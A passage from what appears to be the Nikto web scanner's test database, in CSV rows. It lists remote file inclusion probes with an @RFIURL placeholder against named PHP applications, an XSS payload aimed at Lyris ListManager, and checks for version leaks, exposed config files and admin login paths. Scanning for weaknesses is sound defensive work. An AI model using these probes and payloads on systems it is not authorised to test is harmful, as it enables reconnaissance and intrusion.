(https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006175\",\"5292\",\"c\",\"/yabbse/Sources/Packages.php?sourcedir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006176\",\"5292\",\"c\",\"/yacs/scripts/update_trailer.php?context[path_to_root]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006177\",\"5292\",\"c\",\"/yrch/plugins/metasearch/plug.inc.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006178\",\"5292\",\"c\",\"/ytb/cuenta/cuerpo.php?base_archivo=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006179\",\"5292\",\"c\",\"/zipndownload.php?PP_PATH=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006180\",\"5292\",\"c\",\"/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"006181\",\"0\",\"3\",\"@WORDPRESSwp-content/plugins/akismet/readme.txt\",\"GET\",\"Tested up to\",\"\",\"\",\"\",\"\",\"The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version\",\"\",\"\"\n\"006182\",\"62684\",\"3\",\"@WORDPRESSwp-content/plugins/hello.php\",\"GET\",\"Call to undefined function add_action\\(\\) in \",\"\",\"\",\"\",\"\",\"The WordPress hello.php plugin reveals a file system path\",\"\",\"\"\n\"006183\",\"0\",\"3\",\"@WORDPRESSreadme.html\",\"GET\",\"Version \",\"\",\"5-minute install\",\"\",\"\",\"This WordPress file reveals the installed version.\",\"\",\"\"\n\"006184\",\"0\",\"3\",\"@WORDPRESSwp-links-opml.php\",\"GET\",\"generator=\\\"WordPress\\/\",\"\",\"\",\"\",\"\",\"This WordPress script reveals the installed version.\",\"\",\"\"\n\"006820\",\"3093\",\"1\",\"/includes/db.inc\",\"GET\",\"200\",\"<\\?php\",\"\",\"\",\"\",\"Include files (.inc) should not be served in plain text.\",\"\",\"\"\n\"006185\",\"3093\",\"1\",\"/includes/sendmail.inc\",\"GET\",\"200\",\"<\\?php\",\"\",\"\",\"\",\"Include files (.inc) should not be served in plain text.\",\"\",\"\"\n\"006186\",\"3092\",\"1b\",\"/license.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"License file found may identify site software.\",\"\",\"\"\n\"006187\",\"3092\",\"1b\",\"/install.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Install file found may identify site software.\",\"\",\"\"\n\"006188\",\"3092\",\"1b\",\"/LICENSE.TXT\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"License file found may identify site software.\",\"\",\"\"\n\"006189\",\"3092\",\"1b\",\"/INSTALL.TXT\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Install file found may identify site software.\",\"\",\"\"\n\"006190\",\"3092\",\"1b\",\"/READ_THIS_FIRST.txt\",\"GET\",\"Welcome to ExpressionEngine\",\"\",\"\",\"\",\"\",\"An ExpressionEngine readme file has been found.\",\"\",\"\"\n\"006191\",\"0\",\"3\",\"@WORDPRESSwp-app.log\",\"GET\",\"Array\",\"LANG\",\"\",\"GOOG_FIXURL_LANG\",\"\",\"Wordpress' wp-app.log may leak application/system details.\",\"\",\"\"\n\"006192\",\"0\",\"3\",\"/_vti_bin/_vti_adm/admin.dll\",\"GET\",\"osstatus=\",\"\",\"\",\"specified module could not be found\",\"\",\"FrontPage/SharePoint file found.\",\"\",\"\"\n\"006193\",\"58472\",\"3\",\"/read/rss?forum=nonexistant&rev=0.92\",\"GET\",\"no such element in array\",\"\",\"\",\"\",\"\",\"Lyris ListManager error information disclosure.\",\"\",\"\"\n\"006194\",\"58472\",\"3\",\"/subscribe/survey~1.tml\",\"GET\",\"Database error inf\",\"\",\"\",\"\",\"\",\"Lyris ListManager error information disclosure.\",\"\",\"\"\n\"006195\",\"58463\",\"4\",\"/scripts/message/message_dialog.tml?how_many_back=\\\"><script>alert(1)</script>\",\"GET\",\"<script>alert\\(1\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Lyris ListManager Cross-Site Scripting.\",\"\",\"\"\n\"006196\",\"58464\",\"04\",\"/read/attach_file.tml?page=http://cirt.net/\",\"GET\",\"action=\\\"http:\\/\\/cirt\\.net\",\"\",\"\",\"\",\"\",\"Lyris ListManager XSRF/File Upload.\",\"\",\"\"\n\"006197\",\"0\",\"23\",\"/config/config.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Configuration file found.\",\"\",\"\"\n\"006198\",\"0\",\"23\",\"/htaccess.txt\",\"GET\",\"RewriteEngine On\",\"\",\"\",\"\",\"\",\"Default Joomla! htaccess.txt file found. This should be removed or renamed.\",\"\",\"\"\n\"006199\",\"0\",\"1b\",\"@TYPO3typo3/\",\"GET\",\"c-password\",\"TYPO3\\sScript\\sID\",\"200\",\"\",\"\",\"TYPO3 login found\",\"\",\"\"\n\"006200\",\"0\",\"12\",\"@CGIDIRSphp.ini\",\"GET\",\"\\[PHP\\]\",\"\",\"\",\"\",\"\",\"php.ini file found\",\"\",\"\"\n\"006201\",\"0\",\"3\",\"/ConversionReport.txt\",\"GET\",\"This report shows\",\"\",\"\",\"\",\"\",\"A report file from an ASP.NET 1.1 conversion to an ASP.NET 2.0 project was found and may reveal sensitive information.\",\"\",\"\"\n\"006202\",\"0\",\"b\",\"/cadence/\",\"GET\",\"Cadre Technologies\",\"\",\"\",\"\",\"\",\"Cadre Technologies Cadence WebAccess was found.\",\"\",\"\"\n\"006204\",\"0\",\"3\",\"/cadence/webaccess.net\",\"GET\",\"Failed connection\",\"\",\"\",\"\",\"\",\"Cadre Technologies Cadence WebAccess may reveal a database name due to it being offline or misconfigured.\",\"\",\"\"\n\"006205\",\"0\",\"2\",\"/config/readme.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Readme file found.\",\"\",\"\"\n\"006206\",\"0\",\"2\",\"/data/readme.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Readme file found.\",\"\",\"\"\n\"006207\",\"0\",\"2\",\"/log/readme.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Readme file found.\",\"\",\"\"\n\"006208\",\"0\",\"2\",\"/logs/readme.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Readme file found.\",\"\",\"\"\n\"006209\",\"0\",\"2\",\"/uploads/readme.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Readme file found.\",\"\",\"\"\n\"006210\",\"0\",\"b\",\"/cadence/help/help.htm\",\"GET\",\"Cadre Technologies\",\"\",\"\",\"\",\"\",\"Cadre Technologies Cadence WebAccess help files found.\",\"\",\"\"\n\"006211\",\"0\",\"b\",\"/\",\"GET\",\"img src=\\\"welcome\\.png\\\" alt=\\\"IIS7\\\"\",\"\",\"\",\"\",\"\",\"Appears to be a default IIS 7 install.\",\"\",\"\"\n\"006212\",\"0\",\"3\",\"/install/install.aspx\",\"GET\",\"dtsoftware\\&nbsp;Configuration\",\"\",\"\",\"\",\"\",\"dtsoftware 404 page reveals detailed application information.\",\"\",\"\"\n\"006213\",\"0\",\"23\",\"/webresource.axd?d=junk\",\"GET\",\"NET Framework Version:\",\"\",\"Invalid viewstate\\.\",\"\",\"\",\"ASP.NET reveals its version in error messages when verbose debugging is enabled.\",\"\",\"\"\n\"006214\",\"0\",\"23\",\"/scriptresource.axd?d=junk\",\"GET\",\"NET Framework Version:\",\"\",\"Invalid viewstate\\.\",\"\",\"\",\"ASP.NET reveals its version in error messages when verbose debugging is enabled.\",\"\",\"\"\n\"006215\",\"0\",\"1\",\"/admin1.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page found.\",\"\",\"\"\n\"006217\",\"0\",\"1\",\"/admin.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006218\",\"0\",\"1\",\"/admin/account.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006219\",\"0\",\"1\",\"/admin/account.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006220\",\"0\",\"1\",\"/admin/account.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006221\",\"0\",\"1\",\"/admin/controlpanel.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006222\",\"0\",\"1\",\"/admin/controlpanel.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006223\",\"0\",\"1\",\"/admin/controlpanel.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006224\",\"0\",\"1\",\"/admin/cp.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006225\",\"0\",\"1\",\"/admin/cp.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006226\",\"0\",\"1\",\"/admin/cp.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006227\",\"0\",\"1\",\"/admin/home.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006228\",\"0\",\"1\",\"/admin/home.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006229\",\"0\",\"1\",\"/admin/index.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006230\",\"0\",\"1\",\"/admin/index.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006231\",\"0\",\"1\",\"/admin/login.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006232\",\"0\",\"1\",\"/admin/login.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006233\",\"0\",\"1\",\"/admin/login.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006234\",\"0\",\"1\",\"/admin1.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006235\",\"0\",\"1\",\"/admin1.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006236\",\"0\",\"1\",\"/admin1/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006237\",\"0\",\"1\",\"/admin2.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006238\",\"0\",\"1\",\"/admin2.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006239\",\"0\",\"1\",\"/admin2.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006240\",\"0\",\"1\",\"/admin4_account/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006241\",\"0\",\"1\",\"/admin4_colon/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006242\",\"0\",\"1\",\"/admincontrol.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006243\",\"0\",\"1\",\"/admincontrol.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006244\",\"0\",\"1\",\"/admincontrol.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006245\",\"0\",\"1\",\"/administer/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006246\",\"0\",\"1\",\"/administr8.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006247\",\"0\",\"1\",\"/administr8.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006248\",\"0\",\"1\",\"/administr8.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006249\",\"0\",\"1\",\"/administr8/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006250\",\"0\",\"1\",\"/administracao.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006251\",\"0\",\"1\",\"/administraçao.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006252\",\"0\",\"1\",\"/administracao/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006253\",\"0\",\"1\",\"/administraçao/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006254\",\"0\",\"1\",\"/administracion.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006255\",\"0\",\"1\",\"/administracion/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006256\",\"0\",\"1\",\"/administrateur.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006257\",\"0\",\"1\",\"/administrateur/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006258\",\"0\",\"1\",\"/administratie/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006259\",\"0\",\"1\",\"/administration.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006260\",\"0\",\"1\",\"/administration.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006261\",\"0\",\"1\",\"/administration/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006262\",\"0\",\"1\",\"/administrator.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006263\",\"0\",\"1\",\"/administrator.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006264\",\"0\",\"1\",\"/administrator.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006265\",\"0\",\"1\",\"/administrator/account.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006266\",\"0\",\"1\",\"/administrator/account.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006267\",\"0\",\"1\",\"/administrator/account.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006268\",\"0\",\"1\",\"/administrator/index.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006269\",\"0\",\"1\",\"/administrator/index.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006270\",\"0\",\"1\",\"/administrator/index.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006271\",\"0\",\"1\",\"/administrator/login.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006272\",\"0\",\"1\",\"/administrator/login.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006273\",\"0\",\"1\",\"/administrator/login.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006274\",\"0\",\"1\",\"/administratoraccounts/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006275\",\"0\",\"1\",\"/administrators/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006276\",\"0\",\"1\",\"/administrivia/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006277\",\"0\",\"1\",\"/adminisztrátora.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006278\",\"0\",\"1\",\"/adminisztrátora/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006279\",\"0\",\"1\",\"/adminpanel.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006280\",\"0\",\"1\",\"/adminpanel.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006281\",\"0\",\"1\",\"/adminpanel.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006282\",\"0\",\"1\",\"/adminpro/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006283\",\"0\",\"1\",\"/admins.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006284\",\"0\",\"1\",\"/admins.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006285\",\"0\",\"1\",\"/admins.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006286\",\"0\",\"1\",\"/admins/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006287\",\"0\",\"1\",\"/AdminTools/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006288\",\"0\",\"1\",\"/amministratore.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006289\",\"0\",\"1\",\"/amministratore/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006290\",\"0\",\"1\",\"/autologin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006291\",\"0\",\"1\",\"/banneradmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006292\",\"0\",\"1\",\"/bbadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006293\",\"0\",\"1\",\"/beheerder.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006294\",\"0\",\"1\",\"/beheerder/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006295\",\"0\",\"1\",\"/bigadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006296\",\"0\",\"1\",\"/blogindex/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006297\",\"0\",\"1\",\"/cadmins/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006298\",\"0\",\"1\",\"/ccms/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006299\",\"0\",\"1\",\"/ccms/index.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006300\",\"0\",\"1\",\"/ccms/login.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006301\",\"0\",\"1\",\"/ccp14admin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006302\",\"0\",\"1\",\"/cmsadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006303\",\"0\",\"1\",\"/configuration/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006304\",\"0\",\"1\",\"/configure/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006305\",\"0\",\"1\",\"/controlpanel.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006306\",\"0\",\"1\",\"/controlpanel.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006307\",\"0\",\"1\",\"/controlpanel.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006308\",\"0\",\"1\",\"/controlpanel/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006309\",\"0\",\"1\",\"/cp.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006310\",\"0\",\"1\",\"/cp.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006311\",\"0\",\"1\",\"/cp.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006312\",\"0\",\"1\",\"/cpanel_file/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006313\",\"0\",\"1\",\"/customer_login/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006314\",\"0\",\"1\",\"/database_administration/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006315\",\"0\",\"1\",\"/Database_Administration/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006316\",\"0\",\"1\",\"/dir-login/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006317\",\"0\",\"1\",\"/directadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006318\",\"0\",\"1\",\"/ezsqliteadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006319\",\"0\",\"1\",\"/fileadmin.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006320\",\"0\",\"1\",\"/fileadmin.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006321\",\"0\",\"1\",\"/fileadmin.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006322\",\"0\",\"1\",\"/formslogin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006323\",\"0\",\"1\",\"/globes_admin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006324\",\"0\",\"1\",\"/hpwebjetadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006325\",\"0\",\"1\",\"/Indy_admin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006326\",\"0\",\"1\",\"/irc-macadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006327\",\"0\",\"1\",\"/LiveUser_Admin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006328\",\"0\",\"1\",\"/login_db/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006329\",\"0\",\"1\",\"/login-redirect/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006330\",\"0\",\"1\",\"/login-us/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006331\",\"0\",\"1\",\"/login.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006332\",\"0\",\"1\",\"/login.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006333\",\"0\",\"1\",\"/login.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006334\",\"0\",\"1\",\"/login1/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006335\",\"0\",\"1\",\"/loginflat/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006336\",\"0\",\"1\",\"/logo_sysadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006337\",\"0\",\"1\",\"/Lotus_Domino_Admin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006338\",\"0\",\"1\",\"/macadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006339\",\"0\",\"1\",\"/maintenance/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006340\",\"0\",\"1\",\"/manuallogin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006341\",\"0\",\"1\",\"/memlogin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006342\",\"0\",\"1\",\"/meta_login/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006343\",\"0\",\"1\",\"/modelsearch/login.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006344\",\"0\",\"1\",\"/modelsearch/login.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006345\",\"0\",\"1\",\"/moderator.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006346\",\"0\",\"1\",\"/moderator.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006347\",\"0\",\"1\",\"/moderator.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006348\",\"0\",\"1\",\"/moderator/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006349\",\"0\",\"1\",\"/moderator/admin.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006350\",\"0\",\"1\",\"/moderator/admin.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006351\",\"0\",\"1\",\"/moderator/admin.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006352\",\"0\",\"1\",\"/moderator/login.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006353\",\"0\",\"1\",\"/moderator/login.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006354\",\"0\",\"1\",\"/moderator/login.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section found.\",\"\",\"\"\n\"006355\",\"0\",\"1\",\"/myadmin/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Admin login page/section 